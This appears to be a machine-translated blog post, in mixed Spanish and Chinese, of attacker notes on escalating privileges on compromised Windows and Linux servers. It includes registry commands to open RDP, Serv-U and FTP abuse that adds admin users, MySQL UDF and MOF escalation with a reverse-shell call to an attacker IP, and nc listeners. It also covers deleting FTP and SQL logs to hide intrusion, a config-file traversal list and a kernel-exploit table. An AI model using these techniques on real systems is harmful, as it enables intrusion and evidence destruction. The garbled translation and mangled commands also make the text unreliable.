Seguridad de la red (ocho mencionan la derecha)

En el caso de los troyanos no saben la contraseña puede ser escrito en la parte posterior? Perfil = a (no siempre con éxito)
http://1.11.1.1:8000/2.asp?profile=a

Windnows
el usuario (ordinaria)
administrador (administrador)
del sistema (control)
de los tres no está totalmente contenida, el administrador debe contener usuario, se cruzan sistema con los otros dos porciones de
Linux
el usuario
root

Mejorar la aplicación de la autoridad

Para el ensayo de sitio, al probar un sitio Web, los permisos se han ganado por los permisos del servidor WebShell para cambiar
permisos wenshell no se cumplen, por lo que al poner a la derecha

Por lo general, una secuencia de comandos permisos de ejecución:
ASP / PHP menciona el derecho al anonimato

aspx user权限

jsp通常是系统权限

Mencionar las razones correctas:
como para ganar un sitio web, pero una buena protección del sitio, y hay sitios en el mismo servidor de b, b lagunas, para cruzar un sitio web, ponerlo justo


Encuentra 3389 disponibles directamente crear un nuevo usuario al inicio de sesión

Forzado en 3389:
1. Cargar archivo de Troya, la conexión del interruptor getshell, utilizando una interfaz virtual entre el mandato:
Exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE '' la SYSTEM \ CurrentControlSet \ Control \ Terminal Sever '' fDenyTSConnections', 'REG_DWORD' , 0; -
el comando requiere ciertos privilegios, la mayoría de las veces el desarrollador no desactiva esta parte de la autoridad, y por lo tanto muy fácil de usar

2. 打开记事本,编辑内容如下:
echo[Components]>c:\sql
echoTSEnable=on>>c:\sql
sysocmgr/i:c:\winnt\inf\sysoc.inf/u:c:\sql/q
编辑好后存为BAT 文件,上传至肉鸡,执行。
这里值得注意的是要确定winnt 是否在c 盘,如果在其他盘则需要改动。

关闭3389:
master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE exec', 'SYSTEM \ CurrentControlSet \ Control \ Terminal Sever', 'fDenyTSConnections', 'REG_DWORD', 1; -

ventanas proporcionan la derecha:
conexión Malasia y operaciones en Malasia dentro de
software de terceros proporcionan el derecho a
la FTP:
servidor-u
1. permiso de edición
para comprobar si hay permiso de escritura para modificar el directorio del servidor de U ServUDaemon.ini instalación predeterminada bajo
aumento usuario
seguimiento formato de archivo de configuración, añadir un paso
en la nota de paso contraseña con sal
primer vistazo a lo que la sal se
intercala sal de relleno en la contraseña MD5, transforma
y luego rellenar la contraseña, llenado de nuevo delante de la misma sal
gw123-> fb289605d3e6ba84fecb32b0aa2f83cb
éstos para rellenar un montón de contraseña gwfb289605d3e6ba84fecb32b0aa2f83cb en
conexión FTP
ejecutar el comando
citar el usuario del sitio Exec NET cracer cracer.com/add crear una contraseña de usuario y
sitio de cotización neta ejecutivo localgroup adinistrators cracer / agregar derechos de administrador mencionados usuario

			2. 无修改权限
			只能暴力破解密码---md5

			3.溢出提权
			再大马的选项有提权 ,net user dkill 123 /add 设置好密码完事

			4.管理员密码被修改
			在创建用户后,如果密码被修改,且利用的是server-u提权,那么我们可以找到						servUAdmin.exe文件,进行下载
			随后再利用  代码审计中的c32,将.exe直接拖进来,以16进制的形式查看
			然后搜索时用ansi字符串搜索管理员的账号,就可以找到密码

		g6ftp: 
			下载管理配置文件,将administrator管理密码破解
			使用lcx端口转发(默认只允许本机连接)
			lcx.exe -tran 8027 127.0.0.1 8021
			使用客户端以管理员用户登录
			创建客户并设置权限和执行的批处理文件
			上传批处理
			以创建的普通用户登陆ftp
			执行命令 quote site x.bat
			x.bat 内容为添加系统用户 提权
		filezilla
		
	远程管理软件
	pcanywhere\radmin\vnc

溢出提权

启动项提权

利用pr提权
pr文件的话,要上传到垃圾站的目录/站点根目录,所以再大马中要找到目录位置,
c:\recycle\pr.exe
上传pr,进行提权,随后上传破解hash软件

Base de datos menciona el derecho
mssql mencionan el derecho a
instalar los componentes
SA Adquisición cuenta, a la vista CONFIG.ASP, conec, ASP y otros documentos
abren 3389
para crear un usuario
con privilegios elevados
para completar
la base de datos MYSQL mencionan el derecho a
variables de uso de entorno mencionar el derecho de
imagen para el sistema de archivos puede operar en el
comando de ejecución
$ find / -perm -u = s type f 2> / dev / null
si desea utilizar el comando de archivo para ver el archivo ejecutable
msgmike archivo (archivo después de la búsqueda)
archivo ejecutable
./msgmike
establecer la variable de entorno $ fiesta pash el
gato nuevo, añadir ejecución permisos
táctil CAT
echo "/ bin / sh"> CAT
cuando se ejecuta el comando de nuevo ./msgmike
./msgmike
luego ejecutar export PATH = ''
escalada de privilegios

	udf提权
		获取到对方的mysql数据库下的root账号,密码
		1.查看网站源码里面的数据库配置文件(inc,coon,config.sql,common,data)
		2.查看数据库安装路径下的user.myd(/data/mysql/)
		3.暴力破解mysql密码 破解3306端口入侵
	***************************************************************************************
		知道数据库用户名。密码
		利用testa.php大马
		利用uname -r 查询版本 32 64
		将权限提升---udf.txt查找对应的版本
		复制到mysql语句执行中去
		没有写入权限的话,提前进行设置 chmod 777 -R /usr/lib/mysql/plugin/
		然后利用导入的库文件创建函数
		create function sys_eval returns string soname "mysqludf.so";
		执行命令
		select sys_eval('whoami');
	*********************************************************************************
		数据库开外连
		命令执行
		Grant all privileges on *.* to 'root'@'%' identified by 'root' with grant option;
		然后mysql提权工具
		
	udf提权原理:
		通过root权限导出udf.dll到系统目录下,可以通过udf.dll调用执行cmd
		5.1以上的版本需要导到mysql安装目录lib\plugin\
		以下的版本导到c:\winnt\udf.dll  2000
			      c:\windows\udf.dll  2003


	mof提权(相当牛逼那种)
		1.上传mof.php 输入登录账号 密码,发送命令,提权

		2. 利用大马上传x.mof,并在大马中使用select 命令使得x.mof导出到正确的位置
		select load_file('c:/wmpub/nullevt.mof') into dumpfile 			'c:/windows/system32/wbem/mof/nullevt.mof'
		开启数据库外联
		Grant all privileges on *.* to 'root'@'%' identified by 'cc4789.com' with grant option;

	反弹端口提权:
		1. 利用mysql客户端工具连接mysql服务器,然后执行命令
		mysql.exe -h 172.16.10.11 -uroot -p
		Enter password:
		mysql > \. c:\mysql.txt
		mysql > select backshell("YourIP",2010);

删除cmd_shell组件
EXEC sp_configure 'Mostrar opciones avanzadas', 1
GO
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell', 0
GO
RECONFIGURE
GO

Linux menciona el derecho:
uname edición núcleo -r
y luego encontrar los correspondientes caballo linuxEXP de elevación de privilegios
después de subir al caballo para mover al directorio tmp
cp / var / la www / html / AC / TEMP / AC
Linux menciona el derecho - el puerto de rebote de conectarse
NC - lpvn 12345 haga clic en iniciar conexión
en su propia ventana de compilación
ac gcc generar a.out
plazo a.out ./a.out


¿Cuáles son los usuarios del grupo Administradores?

net localgroup administradores

Get-LocalGroupMember administrador | ft Nombre, PrincipalSource

¿Hay una conexión con otro conexiones de red anfitrión?

netstat-ano

El firewall está activado? Si se configura y cómo?

netsh firewall show de Estado

configuración espectáculo netsh firewall

netsh advfirewall firewall nombre del show regla = all

netsh advfirewall exportación “firewall.txt”

¿Cuáles son algunos de los archivos de registro de IIS en el directorio?

archivo \ inetpub \ logs \ LogFiles \ W3SVC1 \ u_ex [AAMMDD] de .log: C

archivo \ inetpub \ logs \ LogFiles \ W3SVC2 \ u_ex [AAMMDD] de .log: C

archivo \ inetpub \ logs \ LogFiles \ FTPSVC1 \ u_ex [AAMMDD] de .log: C

archivo \ inetpub \ logs \ LogFiles \ FTPSVC2 \ u_ex [AAMMDD] de .log: C

Ya sea XAMPP, instalación de Apache o PHP? Nada de XAMPP, Apache o el archivo de configuración de PHP?

dir / s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf

Get-Childitem -path C: \ php.ini del -Include, httpd.conf, httpd-xampp.conf, my.ini, my.cnf -File -Recurse -ErrorAction SilentlyContinue

¿Hay alguna del sistema de registro web Apache?

dir / s access.log error.log

Get-Childitem -path C: \ del -Include access.log, error.log -File -Recurse -ErrorAction SilentlyContinue

Son cualquier sistema de archivos interesante? Puede estar en el directorio de usuario (escritorio, documentos, etc.)?

dir / s * * pase == * VNC * == * .config * 2> nulGet-Childitem -path C: \ Users \ -Incluye * contraseña , VNC , .config -File -Recurse -ErrorAction SilentlyContinue

MSFTP registro del servidor de procesamiento:

En la "C: \ WINNT \ system32 \ \ MSFTPSVC1 \ LogFiles" Hay por lo ex011120.log / ex011121.log / ex011124.log tres archivos, borrar ex0111124.log sin éxito, la pantalla "... el archivo original está en uso"

Por supuesto, puede simplemente eliminar "ex011120.log / ex011121.log". Y a continuación, utilizar el Bloc de notas para abrir "ex0111124.log", después de la eliminación de algunos de los contenidos en el interior, Guardar, cubriendo termina satisfactoriamente.

Cuando se detiene el servicio "MSFTPSVC" puede eliminar "ex011124.log".

MSSQL Analizador de consultas de registro de conexión clara:

MSSQL 2000 en el registro de la siguiente manera:

HKEY_CURRENT_USER \ Software \ Microsoft \ Microsoft SQL Server \ 80 \ Tools \ Client \ PrefServers

Encontrar información después borrados se hizo cargo.

MSSQL 2005 está en:

C: \ Documents and Settings \ Application Data \ Microsoft \ Microsoft SQL Server \ 90 \ Tools \ Shell \ mru.dat

Varios sitios perfil ruta relativa Daquan:

/config.php

... / ... / config.php

... / config.php

... / ... / ... / config.php

/config.inc.php

./config.inc.php

... / ... / config.inc.php

... / config.inc.php

... / ... / ... / config.inc.php

/conn.php

./conn.php

... / ... / conn.php

... / conn.php

... / ... / ... / conn.php

/conn.asp

./conn.asp

... / ... / conn.asp

... / conn.asp

... / ... / ... / conn.asp

/config.inc.php

./config.inc.php

... / ... / config.inc.php

... / config.inc.php

... / ... / ... / config.inc.php

/config/config.php

... / ... / config / config.php

... / config / config.php

... / ... / ... / config / config.php

/config/config.inc.php

./config/config.inc.php

... / ... / config / config.inc.php

... / config / config.inc.php

... / ... / ... / config / config.inc.php

/config/conn.php

./config/conn.php

... / ... / config / conn.php

... / config / conn.php

... / ... / ... / config / conn.php

/config/conn.asp

./config/conn.asp

... / ... / config / conn.asp

... / config / conn.asp

... / ... / ... / config / conn.asp

/config/config.inc.php

./config/config.inc.php

... / ... / config / config.inc.php

... / config / config.inc.php

... / ... / ... / config / config.inc.php

/data/config.php

... / ... / datos / config.php

... / datos / config.php

... / ... / ... / datos / config.php

/data/config.inc.php

./data/config.inc.php

... / ... / datos / config.inc.php

... / datos / config.inc.php

... / ... / ... / datos / config.inc.php

/data/conn.php

./data/conn.php

... / ... / datos / conn.php

... / datos / conn.php

... / ... / ... / datos / conn.php

/data/conn.asp

./data/conn.asp

... / ... / datos / conn.asp

... / datos / conn.asp

... / ... / ... / datos / conn.asp

/data/config.inc.php

./data/config.inc.php

... / ... / datos / config.inc.php

... / datos / config.inc.php

... / ... / ... / datos / config.inc.php

/include/config.php

... / ... / include / config.php

... / include / config.php

... / ... / ... / include / config.php

/include/config.inc.php

./include/config.inc.php

... / ... / include / config.inc.php

... / include / config.inc.php

... / ... / ... / include / config.inc.php

/include/conn.php

./include/conn.php

... / ... / include / conn.php

... / include / conn.php

... / ... / ... / include / conn.php

/include/conn.asp

./include/conn.asp

... / ... / include / conn.asp

... / include / conn.asp

... / ... / ... / include / conn.asp

/include/config.inc.php

./include/config.inc.php

... / ... / include / config.inc.php

... / include / config.inc.php

... / ... / ... / include / config.inc.php

/inc/config.php

... / ... / inc / config.php

... / inc / config.php

... / ... / ... / inc / config.php

/inc/config.inc.php

./inc/config.inc.php

... / ... / inc / config.inc.php

... / inc / config.inc.php

... / ... / ... / inc / config.inc.php

/inc/conn.php

./inc/conn.php

... / ... / inc / conn.php

... / inc / conn.php

... / ... / ... / inc / conn.php

/inc/conn.asp

./inc/conn.asp

... / ... / inc / conn.asp

... / inc / conn.asp

... / ... / ... / inc / conn.asp

/inc/config.inc.php

./inc/config.inc.php

... / ... / inc / config.inc.php

... / inc / config.inc.php

... / ... / ... / inc / config.inc.php

el index.php

./index.php

... / ... / index.php

... / index.php

... / ... / ... / index.php

/index.asp

./index.asp

... / ... / index.asp

... / index.asp

... / ... / ... / index.asp

ventana de resumen de Daniel menciona el derecho a la recolección de dominio

Lista de vulnerabilidad

Sistema #Operating # Descripción Boletín #Security #KB

CVE-2017-0213 [COM para Windows vulnerabilidad de elevación de privilegios] (Windows 10 / 8,1 / 7/2016/2010/2008)

MS17-010 [KB4013389] [controlador en modo kernel de Windows] (Windows 7/2008/2003 / XP)

MS16-135 [controlador de Windows en modo de núcleo] [KB3199135] (2016)

MS16-098 [KB3178466] [controlador del núcleo] (Win 8.1)

MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012)

MS16-032 [KB3143141] [proceso de inicio de sesión secundario] (2008/7/8/10/2012)

MS16-016 [KB3136041] [WebDAV] (2008 / Vista / 7)

MS15-097 [KB3089656] [ejecución remota de código] (win8.1 / 2012)

MS15-076 [KB3067505] [RPC] (2003/2008/7/8/2012)

MS15-077 [KB3077657] [ATM] (XP / Vista / Win7 / Win8 / 2000/2003/2008 / 2012)

MS15-061 [controlador de núcleo] [KB3057839] (2003/2008/7/8/2012)

MS15-051 [controlador de Windows en modo de núcleo] [KB3057191] (2003/2008/7/8/2012)

MS15-010 [controlador de núcleo] [KB3036220] (2003/2008/7/8)

MS15-015 [KB3031432] [controlador del núcleo] (Win7 / 8 / 8.1 / 2012 / RT / 2012 R2 / 2008 R2)

MS15-001 [controlador de núcleo] [KB3023266] (2008/2012/7/8)

MS14-070 [controlador del núcleo] [KB2989935] (2003)

MS14-068 [KB3011780] [Dominio escalada de privilegios] (2003/2008/2012/7/8)

MS14-058 [KB3000061] [Win32k.sys] (2003/2008/2012/7/8)

MS14-040 [KB2975684] [Controlador AFD] (2003/2008/2012/7/8)

MS14-002 [KB2914368] [NDProxy] (2003 / XP)

MS13-053 [KB2850851] [win32k.sys] (XP / Vista / 2003/2008 / Win 7)

MS13-046 [KB2840221] [dxgkrnl.sys] (Vista / 2003/2008/2012/7)

MS13-005 [KB2778930] [modo de núcleo conductor] (2003/2008 / 2012 / win7 / 8)

MS12-042 [KB2972621] [Service Bus] (2008/2012 / Win7)

MS12-020 [KB2671387] [PDR] (2003/2008/7 / XP)

MS11-080 [KB2592799] [Afd.sys] (2003 / XP)

MS11-062 [KB2566454] [NDISTAPI] (2003 / XP)

MS11-046 [KB2503665] [Afd.sys] (2003/2008/7 / XP)

MS11-011 [KB2393802] [controlador del núcleo] (2003/2008/7 / XP / Vista)

MS10-092 [KB2305420] [programador de tareas] (2008/7)

MS10-065 [KB2267960] [FastCGI] (IIS 5.1,6.0,7.0 y 7.5)

MS10-059 [KB982799] [ACL-Churraskito] (2008/7 / Vista)

MS10-048 [KB2160329] [win32k.sys] (XP SP2 y SP3 / 2003 SP2 / Vista SP1 y SP2 / 2008 oro y SP2 y R2 / Windows 7)

MS10-015 [KB977165] [KiTrap0D] (2003/2008/7 / XP)

MS09-050 ?? [KB975517] [ejecución remota de código] (2008 / Vista)

MS09-020 [KB970483] [IIS 6,0] (IIS 5.1 y 6.0)

MS09-012 [KB959454] [Chimichurri] (Vista / Win7 / 2008 / Vista)

MS08-068 [KB957097] [ejecución remota de código] (2000 / XP)

MS08-067 [KB958644] [ejecución remota de código] (Windows 2000 / XP / Server 2003 / Vista / Server 2008)

MS08-025 [KB941693] [Win32.sys] (XP / 2003/2008 / Vista)

MS06-040 [KB921883] [ejecución remota de código] (2003 / XP / 2000)

MS05-039 [KB899588] [servicio PnP] (Win 9x / ME / NT / 2000 / XP / 2003)

MS03-026 [KB823980] [interfaz RPC de saturación de búfer] (/ NT / 2000 / XP / 2003)

Descargar el proyecto; https://github.com/SecWiki/windows-kernel-exploits

Publicado 17 artículos originales · ganado elogios 2 · Vistas 3521

Supongo que te gusta

Origin blog.csdn.net/Aidang/article/details/97748746
Recomendado
Clasificación